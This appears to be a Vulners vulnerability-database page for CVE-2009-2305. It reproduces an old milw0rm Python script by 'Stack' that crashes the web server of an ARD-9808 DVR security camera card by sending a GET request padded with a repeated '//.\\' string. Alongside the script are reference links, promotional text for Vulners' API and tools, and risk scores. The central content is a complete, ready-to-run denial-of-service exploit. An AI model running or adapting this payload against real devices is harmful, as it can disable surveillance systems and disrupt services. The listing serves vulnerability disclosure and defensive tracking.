ARD-9808 DVR Card Security Camera - GET Remote Denial of Service
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2009-2305 | 1 Jul 200900:00 | – | circl | |
| CVE-2009-2305 | 2 Jul 200910:00 | – | cve | |
| CVE-2009-2305 | 2 Jul 200910:00 | – | cvelist | |
| EUVD-2009-2301 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-2305 | 2 Jul 200910:30 | – | nvd | |
| Design/Logic Flaw | 2 Jul 200910:30 | – | prion |
import socket
import sys
print "----------------------------------------------------------------"
print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service "
print " author: Stack "
print "----------------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\\" * 1000
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('\n\nExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
# milw0rm.com [2009-07-01]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.02343